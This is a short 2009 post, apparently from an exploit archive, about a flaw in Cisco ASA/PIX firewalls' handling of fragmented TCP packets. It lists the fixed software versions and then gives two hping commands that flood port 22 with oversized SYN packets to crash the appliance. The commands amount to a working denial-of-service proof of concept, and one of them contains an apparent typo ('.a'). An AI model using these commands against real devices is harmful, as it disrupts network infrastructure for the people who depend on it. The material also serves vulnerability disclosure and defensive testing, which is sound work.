Cisco ASA-PIX Appliances Fail to Properly Check Fragmented TCP Packets

2009-04-10 18:02:40

The vulnerability affects the following Cisco ASA/PIX versions:

Release Fixed in:
-------- ---------
6.3 Not affected
7.0 7.0(8.6)
7.1 7.1(2.81)
7.2 7.2(4.30)
8.0 8.0(4.28)
8.1 8.1(2.19)
8.2 8.2(0.230)

-----------------------------
Triggering the vuln
------------------------------

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2

Reloading the device is the only way to recover from the denial of service.

| Daniel Uriah Clemens
"Moments of sorrow are moments of sobriety"

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.